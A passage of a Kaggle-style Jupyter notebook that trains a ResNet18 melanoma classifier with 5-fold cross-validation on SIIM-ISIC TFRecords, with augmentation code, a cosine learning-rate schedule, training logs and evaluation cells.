"dataset_path = 'melanoma-256x256'\n\nconfig = {\n \"HEIGHT\": 256,\n \"WIDTH\": 256,\n \"CHANNELS\": 3,\n \"BATCH_SIZE\": 64,\n \"EPOCHS\": 20,\n \"LEARNING_RATE\": 3e-4, \n \"ES_PATIENCE\": 5,\n \"N_FOLDS\": 5,\n \"BASE_MODEL_PATH\": 'imagenet',\n \"DATASET_PATH\": dataset_path\n}\n\nwith open('config.json', 'w') as json_file:\n json.dump(json.loads(json.dumps(config)), json_file)\n \nconfig",
"_____no_output_____"
]
],
[
[
"# Load data",
"_____no_output_____"
]
],
[
[
"database_base_path = '/kaggle/input/siim-isic-melanoma-classification/'\nk_fold = pd.read_csv(database_base_path + 'train.csv')\ntest = pd.read_csv(database_base_path + 'test.csv')\n\nprint('Train samples: %d' % len(k_fold))\ndisplay(k_fold.head())\nprint(f'Test samples: {len(test)}')\ndisplay(test.head())\n\nGCS_PATH = KaggleDatasets().get_gcs_path(dataset_path)\nTRAINING_FILENAMES = tf.io.gfile.glob(GCS_PATH + '/train*.tfrec')\nTEST_FILENAMES = tf.io.gfile.glob(GCS_PATH + '/test*.tfrec')",
"Train samples: 33126\n"
]
],
[
[
"# Augmentations",
"_____no_output_____"
]
],
[
[
"def data_augment(image, label):\n p_spatial = tf.random.uniform([1], minval=0, maxval=1, dtype='float32')\n p_spatial2 = tf.random.uniform([1], minval=0, maxval=1, dtype='float32')\n p_rotate = tf.random.uniform([1], minval=0, maxval=1, dtype='float32')\n p_crop = tf.random.uniform([1], minval=0, maxval=1, dtype='float32')\n \n ### Spatial-level transforms\n if p_spatial >= .2: # flips\n image['input_image'] = tf.image.random_flip_left_right(image['input_image'])\n image['input_image'] = tf.image.random_flip_up_down(image['input_image'])\n if p_spatial >= .7:\n image['input_image'] = tf.image.transpose(image['input_image'])\n \n if p_rotate >= .8: # rotate 270º\n image['input_image'] = tf.image.rot90(image['input_image'], k=3)\n elif p_rotate >= .6: # rotate 180º\n image['input_image'] = tf.image.rot90(image['input_image'], k=2)\n elif p_rotate >= .4: # rotate 90º\n image['input_image'] = tf.image.rot90(image['input_image'], k=1)\n \n if p_spatial2 >= .7: # random rotation range 0º to 45º\n image['input_image'] = transform_rotation(image['input_image'], config['HEIGHT'])\n \n if p_crop >= .6: # crops\n if p_crop >= .95:\n image['input_image'] = tf.image.random_crop(image['input_image'], size=[int(config['HEIGHT']*.7), int(config['WIDTH']*.7), config['CHANNELS']])\n elif p_crop >= .85:\n image['input_image'] = tf.image.random_crop(image['input_image'], size=[int(config['HEIGHT']*.8), int(config['WIDTH']*.8), config['CHANNELS']])\n elif p_crop >= .7:\n image['input_image'] = tf.image.random_crop(image['input_image'], size=[int(config['HEIGHT']*.9), int(config['WIDTH']*.9), config['CHANNELS']])\n else:\n image['input_image'] = tf.image.central_crop(image['input_image'], central_fraction=.6)\n image['input_image'] = tf.image.resize(image['input_image'], size=[config['HEIGHT'], config['WIDTH']])\n\n return image, label",
"_____no_output_____"
]
],
[
[
"## Auxiliary functions",
"_____no_output_____"
]
],
[
[
"# Datasets utility functions\ndef read_labeled_tfrecord(example, height=config['HEIGHT'], width=config['WIDTH'], channels=config['CHANNELS']):\n example = tf.io.parse_single_example(example, LABELED_TFREC_FORMAT)\n image = decode_image(example['image'], height, width, channels)\n label = tf.cast(example['target'], tf.float32)\n # meta features\n data = {}\n data['patient_id'] = tf.cast(example['patient_id'], tf.int32)\n data['sex'] = tf.cast(example['sex'], tf.int32)\n data['age_approx'] = tf.cast(example['age_approx'], tf.int32)\n data['anatom_site_general_challenge'] = tf.cast(tf.one_hot(example['anatom_site_general_challenge'], 7), tf.int32)\n data['diagnosis'] = tf.cast(tf.one_hot(example['diagnosis'], 10), tf.int32)\n \n return {'input_image': image, 'input_meta': data}, label # returns a dataset of (image, data, label)\n\ndef read_labeled_tfrecord_eval(example, height=config['HEIGHT'], width=config['WIDTH'], channels=config['CHANNELS']):\n example = tf.io.parse_single_example(example, LABELED_TFREC_FORMAT)\n image = decode_image(example['image'], height, width, channels)\n label = tf.cast(example['target'], tf.float32)\n image_name = example['image_name']\n # meta features\n data = {}\n data['patient_id'] = tf.cast(example['patient_id'], tf.int32)\n data['sex'] = tf.cast(example['sex'], tf.int32)\n data['age_approx'] = tf.cast(example['age_approx'], tf.int32)\n data['anatom_site_general_challenge'] = tf.cast(tf.one_hot(example['anatom_site_general_challenge'], 7), tf.int32)\n data['diagnosis'] = tf.cast(tf.one_hot(example['diagnosis'], 10), tf.int32)\n \n return {'input_image': image, 'input_meta': data}, label, image_name # returns a dataset of (image, data, label, image_name)\n\ndef load_dataset(filenames, ordered=False, buffer_size=-1):\n ignore_order = tf.data.Options()\n if not ordered:\n ignore_order.experimental_deterministic = False # disable order, increase speed\n\n dataset = tf.data.TFRecordDataset(filenames, num_parallel_reads=buffer_size) # automatically interleaves reads from multiple files\n dataset = dataset.with_options(ignore_order) # uses data as soon as it streams in, rather than in its original order\n dataset = dataset.map(read_labeled_tfrecord, num_parallel_calls=buffer_size)\n \n return dataset # returns a dataset of (image, data, label)\n\ndef load_dataset_eval(filenames, buffer_size=-1):\n dataset = tf.data.TFRecordDataset(filenames, num_parallel_reads=buffer_size) # automatically interleaves reads from multiple files\n dataset = dataset.map(read_labeled_tfrecord_eval, num_parallel_calls=buffer_size)\n \n return dataset # returns a dataset of (image, data, label, image_name)\n\ndef get_training_dataset(filenames, batch_size, buffer_size=-1):\n dataset = load_dataset(filenames, ordered=False, buffer_size=buffer_size)\n dataset = dataset.map(data_augment, num_parallel_calls=AUTO)\n dataset = dataset.repeat() # the training dataset must repeat for several epochs\n dataset = dataset.shuffle(2048)\n dataset = dataset.batch(batch_size, drop_remainder=True) # slighly faster with fixed tensor sizes\n dataset = dataset.prefetch(buffer_size) # prefetch next batch while training (autotune prefetch buffer size)\n return dataset\n\ndef get_validation_dataset(filenames, ordered=True, repeated=False, batch_size=32, buffer_size=-1):\n dataset = load_dataset(filenames, ordered=ordered, buffer_size=buffer_size)\n if repeated:\n dataset = dataset.repeat()\n dataset = dataset.shuffle(2048)\n dataset = dataset.batch(batch_size, drop_remainder=repeated)\n dataset = 
dataset.prefetch(buffer_size)\n return dataset\n\ndef get_eval_dataset(filenames, batch_size=32, buffer_size=-1):\n dataset = load_dataset_eval(filenames, buffer_size=buffer_size)\n dataset = dataset.batch(batch_size, drop_remainder=False)\n dataset = dataset.prefetch(buffer_size)\n return dataset\n\n# Test function\ndef read_unlabeled_tfrecord(example, height=config['HEIGHT'], width=config['WIDTH'], channels=config['CHANNELS']):\n example = tf.io.parse_single_example(example, UNLABELED_TFREC_FORMAT)\n image = decode_image(example['image'], height, width, channels)\n image_name = example['image_name']\n # meta features\n data = {}\n data['patient_id'] = tf.cast(example['patient_id'], tf.int32)\n data['sex'] = tf.cast(example['sex'], tf.int32)\n data['age_approx'] = tf.cast(example['age_approx'], tf.int32)\n data['anatom_site_general_challenge'] = tf.cast(tf.one_hot(example['anatom_site_general_challenge'], 7), tf.int32)\n \n return {'input_image': image, 'input_tabular': data}, image_name # returns a dataset of (image, data, image_name)\n\ndef load_dataset_test(filenames, buffer_size=-1):\n dataset = tf.data.TFRecordDataset(filenames, num_parallel_reads=buffer_size) # automatically interleaves reads from multiple files\n dataset = dataset.map(read_unlabeled_tfrecord, num_parallel_calls=buffer_size)\n # returns a dataset of (image, data, label, image_name) pairs if labeled=True or (image, data, image_name) pairs if labeled=False\n return dataset\n\ndef get_test_dataset(filenames, batch_size=32, buffer_size=-1):\n dataset = load_dataset_test(filenames, buffer_size=buffer_size)\n dataset = dataset.batch(batch_size, drop_remainder=False)\n dataset = dataset.prefetch(buffer_size)\n return dataset\n\n# Advanced augmentations\ndef transform_rotation(image, height):\n # input image - is one image of size [dim,dim,3] not a batch of [b,dim,dim,3]\n # output - image randomly rotated\n DIM = height\n XDIM = DIM%2 #fix for size 331\n \n rotation = 45. * tf.random.uniform([1], minval=0, maxval=1, dtype='float32')\n # CONVERT DEGREES TO RADIANS\n rotation = math.pi * rotation / 180.\n \n # ROTATION MATRIX\n c1 = tf.math.cos(rotation)\n s1 = tf.math.sin(rotation)\n one = tf.constant([1] ,dtype='float32')\n zero = tf.constant([0], dtype='float32')\n rotation_matrix = tf.reshape( tf.concat([c1,s1,zero, -s1,c1,zero, zero,zero,one],axis=0), [3, 3] )\n\n # LIST DESTINATION PIXEL INDICES\n x = tf.repeat( tf.range(DIM//2,-DIM//2,-1), DIM )\n y = tf.tile( tf.range(-DIM//2,DIM//2),[DIM] )\n z = tf.ones([DIM*DIM],dtype='int32')\n idx = tf.stack( [x,y,z] )\n \n # ROTATE DESTINATION PIXELS ONTO ORIGIN PIXELS\n idx2 = K.dot(rotation_matrix,tf.cast(idx,dtype='float32'))\n idx2 = K.cast(idx2,dtype='int32')\n idx2 = K.clip(idx2,-DIM//2+XDIM+1,DIM//2)\n \n # FIND ORIGIN PIXEL VALUES \n idx3 = tf.stack( [DIM//2-idx2[0,], DIM//2-1+idx2[1,]] )\n d = tf.gather_nd(image, tf.transpose(idx3))\n \n return tf.reshape(d,[DIM, DIM, 3])",
"_____no_output_____"
]
],
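[
[
"Note: `LABELED_TFREC_FORMAT`, `UNLABELED_TFREC_FORMAT` and `decode_image` are imported from `melanoma_utility_scripts`. For reference, a hedged sketch of what such definitions typically look like for this kind of TFRecord dataset (an assumption inferred from the fields parsed above; the project's actual code may differ):",
"_____no_output_____"
],
[
"import tensorflow as tf\n\n# Illustrative feature spec (assumption): one entry per field accessed in read_labeled_tfrecord\nLABELED_TFREC_FORMAT_SKETCH = {\n    'image': tf.io.FixedLenFeature([], tf.string),  # encoded JPEG bytes\n    'image_name': tf.io.FixedLenFeature([], tf.string),\n    'patient_id': tf.io.FixedLenFeature([], tf.int64),\n    'sex': tf.io.FixedLenFeature([], tf.int64),\n    'age_approx': tf.io.FixedLenFeature([], tf.int64),\n    'anatom_site_general_challenge': tf.io.FixedLenFeature([], tf.int64),\n    'diagnosis': tf.io.FixedLenFeature([], tf.int64),\n    'target': tf.io.FixedLenFeature([], tf.int64),\n}\n\ndef decode_image_sketch(image_data, height, width, channels):\n    # decode JPEG bytes, scale pixels to [0, 1] and set a static shape\n    image = tf.image.decode_jpeg(image_data, channels=channels)\n    image = tf.cast(image, tf.float32) / 255.0\n    return tf.reshape(image, [height, width, channels])",
"_____no_output_____"
]
],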
[
[
"## Learning rate scheduler",
"_____no_output_____"
]
],
[
[
"lr_min = 1e-6\nlr_start = 0\nlr_max = config['LEARNING_RATE']\nstep_size = 26880 // config['BATCH_SIZE'] #(len(k_fold[k_fold[f'fold_{fold_n}'] == 'train']) * 2) // config['BATCH_SIZE']\ntotal_steps = config['EPOCHS'] * step_size\nhold_max_steps = 0\nwarmup_steps = step_size * 5\nnum_cycles = 5\n\nrng = [i for i in range(0, total_steps, config['BATCH_SIZE'])]\ny = [cosine_with_hard_restarts_schedule_with_warmup(tf.cast(x, tf.float32), total_steps=total_steps, \n warmup_steps=warmup_steps, lr_start=lr_start, \n lr_max=lr_max, lr_min=lr_min, num_cycles=num_cycles) for x in rng]\n\nsns.set(style=\"whitegrid\")\nfig, ax = plt.subplots(figsize=(20, 6))\nplt.plot(rng, y)\nprint(\"Learning rate schedule: {:.3g} to {:.3g} to {:.3g}\".format(y[0], max(y), y[-1]))",
"Learning rate schedule: 0 to 0.0003 to 1e-06\n"
]
],
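[
[
"The schedule itself is imported from `scripts_step_lr_schedulers`. As a reference, here is a minimal pure-Python sketch of a cosine schedule with linear warmup and hard restarts (an illustrative assumption; the actual implementation operates on TensorFlow tensors and may differ in detail):",
"_____no_output_____"
],
[
"import math\n\ndef cosine_with_hard_restarts_sketch(step, total_steps, warmup_steps,\n                                     lr_start=0.0, lr_max=3e-4, lr_min=1e-6, num_cycles=1):\n    # linear warmup from lr_start to lr_max\n    if step < warmup_steps:\n        return lr_start + (lr_max - lr_start) * step / warmup_steps\n    # progress through the post-warmup phase, split into num_cycles cosine decays\n    progress = (step - warmup_steps) / max(1.0, total_steps - warmup_steps)\n    cycle_progress = (progress * num_cycles) % 1.0\n    return lr_min + 0.5 * (lr_max - lr_min) * (1.0 + math.cos(math.pi * cycle_progress))\n\n# example: learning rate right after warmup vs at the very end\nprint(cosine_with_hard_restarts_sketch(warmup_steps, total_steps, warmup_steps))\nprint(cosine_with_hard_restarts_sketch(total_steps - 1, total_steps, warmup_steps))",
"_____no_output_____"
]
],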
[
[
"# Model",
"_____no_output_____"
]
],
[
[
"def model_fn(input_shape):\n input_image = L.Input(shape=input_shape, name='input_image')\n BaseModel, preprocess_input = Classifiers.get('resnet18')\n base_model = BaseModel(input_shape=input_shape, \n weights=config['BASE_MODEL_PATH'], \n include_top=False)\n\n x = base_model(input_image)\n x = L.GlobalAveragePooling2D()(x)\n output = L.Dense(1, activation='sigmoid')(x)\n \n model = Model(inputs=input_image, outputs=output)\n \n return model",
"_____no_output_____"
]
],
[
[
"# Training",
"_____no_output_____"
]
],
[
[
"eval_dataset = get_eval_dataset(TRAINING_FILENAMES, batch_size=config['BATCH_SIZE'], buffer_size=AUTO)\nimage_names = next(iter(eval_dataset.unbatch().map(lambda data, label, image_name: image_name).batch(len(k_fold)))).numpy().astype('U')\nimage_data = eval_dataset.map(lambda data, label, image_name: data)\n\nhistory_list = []\nkfold = KFold(config['N_FOLDS'], shuffle=True, random_state=SEED)\nfor n_fold, (trn_idx, val_idx) in enumerate(kfold.split(TRAINING_FILENAMES)):\n n_fold +=1\n print('\\nFOLD: %d' % (n_fold))\n# tf.tpu.experimental.initialize_tpu_system(tpu)\n K.clear_session()\n \n ### Data\n train_filenames = np.array(TRAINING_FILENAMES)[trn_idx]\n valid_filenames = np.array(TRAINING_FILENAMES)[val_idx]\n train_size = count_data_items(train_filenames)\n\n step_size = train_size // config['BATCH_SIZE']\n\n # Train model\n model_path = f'model_fold_{n_fold}.h5'\n \n es = EarlyStopping(monitor='val_loss', mode='min', patience=config['ES_PATIENCE'], \n restore_best_weights=True, verbose=1)\n checkpoint = ModelCheckpoint(model_path, monitor='val_loss', mode='min', \n save_best_only=True, save_weights_only=True)\n \n with strategy.scope():\n model = model_fn((config['HEIGHT'], config['WIDTH'], config['CHANNELS']))\n \n lr = lambda: cosine_with_hard_restarts_schedule_with_warmup(tf.cast(optimizer.iterations, tf.float32), \n total_steps=total_steps, warmup_steps=warmup_steps, \n lr_start=lr_start, lr_max=lr_max, lr_min=lr_min, \n num_cycles=num_cycles)\n \n optimizer = optimizers.Adam(learning_rate=lr)\n model.compile(optimizer, loss=losses.BinaryCrossentropy(label_smoothing=0.05), \n metrics=[metrics.AUC()])\n \n history = model.fit(get_training_dataset(train_filenames, batch_size=config['BATCH_SIZE'], buffer_size=AUTO),\n validation_data=get_validation_dataset(valid_filenames, ordered=True, repeated=False, \n batch_size=config['BATCH_SIZE'], buffer_size=AUTO),\n epochs=config['EPOCHS'], \n steps_per_epoch=step_size,\n callbacks=[checkpoint, es], \n verbose=2).history\n \n history_list.append(history)\n \n # Make predictions\n preds = model.predict(image_data)\n name_preds = dict(zip(image_names, preds.reshape(len(preds))))\n k_fold[f'pred_fold_{n_fold}'] = k_fold.apply(lambda x: name_preds[x['image_name']], axis=1)\n \n valid_filenames = np.array(TRAINING_FILENAMES)[val_idx]\n valid_dataset = get_eval_dataset(valid_filenames, batch_size=config['BATCH_SIZE'], buffer_size=AUTO)\n valid_image_names = next(iter(valid_dataset.unbatch().map(lambda data, label, image_name: image_name).batch(count_data_items(valid_filenames)))).numpy().astype('U')\n k_fold[f'fold_{n_fold}'] = k_fold.apply(lambda x: 'validation' if x['image_name'] in valid_image_names else 'train', axis=1)",
"\nFOLD: 1\nDownloading data from https://github.com/qubvel/classification_models/releases/download/0.0.1/resnet18_imagenet_1000_no_top.h5\n44924928/44920640 [==============================] - 2s 0us/step\nEpoch 1/20\n388/388 - 110s - loss: 0.3444 - auc: 0.5745 - val_loss: 0.3190 - val_auc: 0.4678\nEpoch 2/20\n388/388 - 110s - loss: 0.1709 - auc: 0.7907 - val_loss: 0.1716 - val_auc: 0.6173\nEpoch 3/20\n388/388 - 110s - loss: 0.1693 - auc: 0.8084 - val_loss: 0.1725 - val_auc: 0.7991\nEpoch 4/20\n388/388 - 109s - loss: 0.1676 - auc: 0.8360 - val_loss: 0.1761 - val_auc: 0.7353\nEpoch 5/20\n388/388 - 110s - loss: 0.1678 - auc: 0.8342 - val_loss: 0.1723 - val_auc: 0.8271\nEpoch 6/20\n388/388 - 109s - loss: 0.1678 - auc: 0.8349 - val_loss: 0.1719 - val_auc: 0.8505\nEpoch 7/20\n388/388 - 109s - loss: 0.1659 - auc: 0.8508 - val_loss: 0.1651 - val_auc: 0.8536\nEpoch 8/20\n388/388 - 109s - loss: 0.1619 - auc: 0.9023 - val_loss: 0.1629 - val_auc: 0.8788\nEpoch 9/20\n388/388 - 109s - loss: 0.1617 - auc: 0.8975 - val_loss: 0.1731 - val_auc: 0.7886\nEpoch 10/20\n388/388 - 108s - loss: 0.1657 - auc: 0.8637 - val_loss: 0.1641 - val_auc: 0.8696\nEpoch 11/20\n388/388 - 110s - loss: 0.1622 - auc: 0.8856 - val_loss: 0.1622 - val_auc: 0.8726\nEpoch 12/20\n388/388 - 109s - loss: 0.1584 - auc: 0.9298 - val_loss: 0.1703 - val_auc: 0.8444\nEpoch 13/20\n388/388 - 109s - loss: 0.1658 - auc: 0.8566 - val_loss: 0.1642 - val_auc: 0.8524\nEpoch 14/20\n388/388 - 110s - loss: 0.1625 - auc: 0.8843 - val_loss: 0.1638 - val_auc: 0.8741\nEpoch 15/20\n388/388 - 109s - loss: 0.1597 - auc: 0.9171 - val_loss: 0.1613 - val_auc: 0.8888\nEpoch 16/20\n388/388 - 108s - loss: 0.1631 - auc: 0.8702 - val_loss: 0.1672 - val_auc: 0.8218\nEpoch 17/20\n388/388 - 109s - loss: 0.1642 - auc: 0.8696 - val_loss: 0.1636 - val_auc: 0.8557\nEpoch 18/20\n388/388 - 110s - loss: 0.1577 - auc: 0.9135 - val_loss: 0.1623 - val_auc: 0.8898\nEpoch 19/20\n388/388 - 110s - loss: 0.1611 - auc: 0.8941 - val_loss: 0.1652 - val_auc: 0.8399\nEpoch 20/20\nRestoring model weights from the end of the best epoch.\n388/388 - 109s - loss: 0.1628 - auc: 0.8817 - val_loss: 0.1705 - val_auc: 0.6760\nEpoch 00020: early stopping\n\nFOLD: 2\nEpoch 1/20\n420/420 - 116s - loss: 0.5299 - auc: 0.5868 - val_loss: 0.2236 - val_auc: 0.4214\nEpoch 2/20\n420/420 - 116s - loss: 0.1708 - auc: 0.7867 - val_loss: 0.1733 - val_auc: 0.6629\nEpoch 3/20\n420/420 - 117s - loss: 0.1683 - auc: 0.8226 - val_loss: 0.1727 - val_auc: 0.7847\nEpoch 4/20\n420/420 - 116s - loss: 0.1681 - auc: 0.8297 - val_loss: 0.1718 - val_auc: 0.8458\nEpoch 5/20\n420/420 - 116s - loss: 0.1673 - auc: 0.8255 - val_loss: 0.1695 - val_auc: 0.8215\nEpoch 6/20\n420/420 - 116s - loss: 0.1670 - auc: 0.8507 - val_loss: 0.1700 - val_auc: 0.7645\nEpoch 7/20\n420/420 - 116s - loss: 0.1635 - auc: 0.8791 - val_loss: 0.1645 - val_auc: 0.8674\nEpoch 8/20\n420/420 - 116s - loss: 0.1594 - auc: 0.9177 - val_loss: 0.1625 - val_auc: 0.8850\nEpoch 9/20\n420/420 - 115s - loss: 0.1655 - auc: 0.8447 - val_loss: 0.1693 - val_auc: 0.7999\nEpoch 10/20\n420/420 - 115s - loss: 0.1627 - auc: 0.8884 - val_loss: 0.1658 - val_auc: 0.8688\nEpoch 11/20\n420/420 - 115s - loss: 0.1591 - auc: 0.9168 - val_loss: 0.1622 - val_auc: 0.8905\nEpoch 12/20\n420/420 - 115s - loss: 0.1646 - auc: 0.8718 - val_loss: 0.1707 - val_auc: 0.8474\nEpoch 13/20\n420/420 - 115s - loss: 0.1625 - auc: 0.8905 - val_loss: 0.1635 - val_auc: 0.8824\nEpoch 14/20\n420/420 - 115s - loss: 0.1570 - auc: 0.9257 - val_loss: 0.1616 - val_auc: 0.8943\nEpoch 15/20\n420/420 - 115s - loss: 
0.1631 - auc: 0.8787 - val_loss: 0.1676 - val_auc: 0.8432\nEpoch 16/20\n420/420 - 115s - loss: 0.1626 - auc: 0.8970 - val_loss: 0.1642 - val_auc: 0.8632\nEpoch 17/20\n420/420 - 116s - loss: 0.1564 - auc: 0.9316 - val_loss: 0.1615 - val_auc: 0.9003\nEpoch 18/20\n420/420 - 116s - loss: 0.1630 - auc: 0.8833 - val_loss: 0.1666 - val_auc: 0.8375\nEpoch 19/20\n420/420 - 115s - loss: 0.1605 - auc: 0.8992 - val_loss: 0.1638 - val_auc: 0.8813\nEpoch 20/20\n420/420 - 115s - loss: 0.1563 - auc: 0.9301 - val_loss: 0.1605 - val_auc: 0.9036\n\nFOLD: 3\nEpoch 1/20\n420/420 - 116s - loss: 0.3711 - auc: 0.6013 - val_loss: 0.3470 - val_auc: 0.3612\nEpoch 2/20\n420/420 - 116s - loss: 0.1696 - auc: 0.8117 - val_loss: 0.1774 - val_auc: 0.5866\nEpoch 3/20\n420/420 - 116s - loss: 0.1684 - auc: 0.8100 - val_loss: 0.1683 - val_auc: 0.8577\nEpoch 4/20\n420/420 - 115s - loss: 0.1680 - auc: 0.8224 - val_loss: 0.1738 - val_auc: 0.8358\nEpoch 5/20\n420/420 - 116s - loss: 0.1662 - auc: 0.8292 - val_loss: 0.1695 - val_auc: 0.8260\nEpoch 6/20\n420/420 - 115s - loss: 0.1666 - auc: 0.8406 - val_loss: 0.1684 - val_auc: 0.8442\nEpoch 7/20\n420/420 - 116s - loss: 0.1649 - auc: 0.8679 - val_loss: 0.1645 - val_auc: 0.8949\nEpoch 8/20\n420/420 - 115s - loss: 0.1596 - auc: 0.9078 - val_loss: 0.1625 - val_auc: 0.8940\nEpoch 9/20\n420/420 - 116s - loss: 0.1664 - auc: 0.8366 - val_loss: 0.1758 - val_auc: 0.8424\nEpoch 10/20\n420/420 - 115s - loss: 0.1633 - auc: 0.8811 - val_loss: 0.1647 - val_auc: 0.8759\nEpoch 11/20\n420/420 - 116s - loss: 0.1603 - auc: 0.9169 - val_loss: 0.1616 - val_auc: 0.8950\nEpoch 12/20\n420/420 - 115s - loss: 0.1651 - auc: 0.8374 - val_loss: 0.1774 - val_auc: 0.8308\nEpoch 13/20\n420/420 - 115s - loss: 0.1619 - auc: 0.8947 - val_loss: 0.1663 - val_auc: 0.8679\nEpoch 14/20\n420/420 - 115s - loss: 0.1601 - auc: 0.9131 - val_loss: 0.1629 - val_auc: 0.8866\nEpoch 15/20\n420/420 - 115s - loss: 0.1634 - auc: 0.8658 - val_loss: 0.1701 - val_auc: 0.7866\nEpoch 16/20\nRestoring model weights from the end of the best epoch.\n420/420 - 115s - loss: 0.1635 - auc: 0.8814 - val_loss: 0.1628 - val_auc: 0.8912\nEpoch 00016: early stopping\n\nFOLD: 4\nEpoch 1/20\n420/420 - 116s - loss: 0.4498 - auc: 0.5856 - val_loss: 0.3107 - val_auc: 0.5576\nEpoch 2/20\n420/420 - 116s - loss: 0.1690 - auc: 0.8076 - val_loss: 0.1769 - val_auc: 0.5459\nEpoch 3/20\n420/420 - 115s - loss: 0.1694 - auc: 0.8104 - val_loss: 0.1708 - val_auc: 0.7719\nEpoch 4/20\n420/420 - 115s - loss: 0.1682 - auc: 0.8245 - val_loss: 0.1726 - val_auc: 0.8335\nEpoch 5/20\n420/420 - 115s - loss: 0.1666 - auc: 0.8292 - val_loss: 0.1743 - val_auc: 0.7735\nEpoch 6/20\n420/420 - 115s - loss: 0.1666 - auc: 0.8330 - val_loss: 0.1670 - val_auc: 0.8400\nEpoch 7/20\n420/420 - 115s - loss: 0.1629 - auc: 0.8741 - val_loss: 0.1679 - val_auc: 0.8536\nEpoch 8/20\n420/420 - 115s - loss: 0.1593 - auc: 0.9154 - val_loss: 0.1641 - val_auc: 0.8801\nEpoch 9/20\n420/420 - 115s - loss: 0.1652 - auc: 0.8473 - val_loss: 0.1692 - val_auc: 0.8480\nEpoch 10/20\n420/420 - 114s - loss: 0.1636 - auc: 0.8740 - val_loss: 0.1665 - val_auc: 0.8579\nEpoch 11/20\n420/420 - 115s - loss: 0.1581 - auc: 0.9172 - val_loss: 0.1640 - val_auc: 0.8884\nEpoch 12/20\n420/420 - 115s - loss: 0.1650 - auc: 0.8634 - val_loss: 0.1695 - val_auc: 0.8133\nEpoch 13/20\n420/420 - 115s - loss: 0.1628 - auc: 0.8866 - val_loss: 0.1674 - val_auc: 0.8332\nEpoch 14/20\n420/420 - 115s - loss: 0.1583 - auc: 0.9123 - val_loss: 0.1646 - val_auc: 0.8600\nEpoch 15/20\n420/420 - 115s - loss: 0.1656 - auc: 0.8635 - val_loss: 0.1747 - 
val_auc: 0.8113\nEpoch 16/20\nRestoring model weights from the end of the best epoch.\n420/420 - 115s - loss: 0.1613 - auc: 0.8895 - val_loss: 0.1654 - val_auc: 0.8778\nEpoch 00016: early stopping\n\nFOLD: 5\nEpoch 1/20\n420/420 - 115s - loss: 0.2389 - auc: 0.6066 - val_loss: 0.2482 - val_auc: 0.4157\nEpoch 2/20\n420/420 - 115s - loss: 0.1703 - auc: 0.7821 - val_loss: 0.1790 - val_auc: 0.6004\nEpoch 3/20\n420/420 - 116s - loss: 0.1693 - auc: 0.8237 - val_loss: 0.1690 - val_auc: 0.8112\nEpoch 4/20\n420/420 - 115s - loss: 0.1688 - auc: 0.8130 - val_loss: 0.1662 - val_auc: 0.8398\nEpoch 5/20\n420/420 - 116s - loss: 0.1674 - auc: 0.8336 - val_loss: 0.1714 - val_auc: 0.7537\nEpoch 6/20\n420/420 - 117s - loss: 0.1663 - auc: 0.8521 - val_loss: 0.1638 - val_auc: 0.8589\nEpoch 7/20\n420/420 - 116s - loss: 0.1639 - auc: 0.8717 - val_loss: 0.1637 - val_auc: 0.8728\nEpoch 8/20\n420/420 - 116s - loss: 0.1608 - auc: 0.9067 - val_loss: 0.1607 - val_auc: 0.9037\nEpoch 9/20\n420/420 - 115s - loss: 0.1664 - auc: 0.8376 - val_loss: 0.1839 - val_auc: 0.8883\nEpoch 10/20\n420/420 - 116s - loss: 0.1646 - auc: 0.8744 - val_loss: 0.1609 - val_auc: 0.9090\nEpoch 11/20\n420/420 - 115s - loss: 0.1591 - auc: 0.9130 - val_loss: 0.1608 - val_auc: 0.9066\nEpoch 12/20\n420/420 - 115s - loss: 0.1666 - auc: 0.8533 - val_loss: 0.1643 - val_auc: 0.8714\nEpoch 13/20\nRestoring model weights from the end of the best epoch.\n420/420 - 115s - loss: 0.1634 - auc: 0.8730 - val_loss: 0.1620 - val_auc: 0.8997\nEpoch 00013: early stopping\n"
]
],
[
[
"## Model loss graph",
"_____no_output_____"
]
],
[
[
"for n_fold in range(config['N_FOLDS']):\n print(f'Fold: {n_fold + 1}')\n plot_metrics(history_list[n_fold])",
"Fold: 1\n"
]
],
[
[
"## Model loss graph aggregated",
"_____no_output_____"
]
],
[
[
"plot_metrics_agg(history_list, config['N_FOLDS'])",
"_____no_output_____"
]
],
[
[
"# Model evaluation",
"_____no_output_____"
]
],
[
[
"display(evaluate_model(k_fold, config['N_FOLDS']).style.applymap(color_map))",
"_____no_output_____"
]
],
[
[
"# Model evaluation by Subset",
"_____no_output_____"
]
],
[
[
"display(evaluate_model_Subset(k_fold, config['N_FOLDS']).style.applymap(color_map))",
"_____no_output_____"
]
],
[
[
"# Confusion matrix",
"_____no_output_____"
]
],
[
[
"for n_fold in range(config['N_FOLDS']):\n n_fold += 1\n pred_col = f'pred_fold_{n_fold}' \n train_set = k_fold[k_fold[f'fold_{n_fold}'] == 'train']\n valid_set = k_fold[k_fold[f'fold_{n_fold}'] == 'validation'] \n print(f'Fold: {n_fold}')\n plot_confusion_matrix(train_set['target'], np.round(train_set[pred_col]),\n valid_set['target'], np.round(valid_set[pred_col]))",
"Fold: 1\n"
]
],
[
[
"# Visualize predictions",
"_____no_output_____"
]
],
[
[
"k_fold['pred'] = 0\nfor n_fold in range(config['N_FOLDS']):\n k_fold['pred'] += k_fold[f'pred_fold_{n_fold+1}'] / config['N_FOLDS']\n \nprint('Top 10 samples')\ndisplay(k_fold[['image_name', 'sex', 'age_approx','anatom_site_general_challenge', 'diagnosis',\n 'target', 'pred'] + [c for c in k_fold.columns if (c.startswith('pred_fold'))]].head(10))\n\nprint('Top 10 positive samples')\ndisplay(k_fold[['image_name', 'sex', 'age_approx','anatom_site_general_challenge', 'diagnosis',\n 'target', 'pred'] + [c for c in k_fold.columns if (c.startswith('pred_fold'))]].query('target == 1').head(10))\n\n\nprint('Top 10 predicted positive samples')\ndisplay(k_fold[['image_name', 'sex', 'age_approx','anatom_site_general_challenge', 'diagnosis',\n 'target', 'pred'] + [c for c in k_fold.columns if (c.startswith('pred_fold'))]].query('pred > .5').head(10))\n\nprint('Label/prediction distribution')\nprint(f\"Train positive labels: {len(k_fold[k_fold['target'] > .5])}\")\nprint(f\"Train positive predictions: {len(k_fold[k_fold['pred'] > .5])}\")\nprint(f\"Train positive correct predictions: {len(k_fold[(k_fold['target'] > .5) & (k_fold['pred'] > .5)])}\")",
"Top 10 samples\n"
]
],
[
[
"# Make predictions",
"_____no_output_____"
]
],
[
[
"model_path_list = glob.glob('/kaggle/working/' + '*.h5')\nn_models = len(model_path_list)\nmodel_path_list.sort()\n\nprint(f'{n_models} Models to predict:')\nprint(*model_path_list, sep='\\n')",
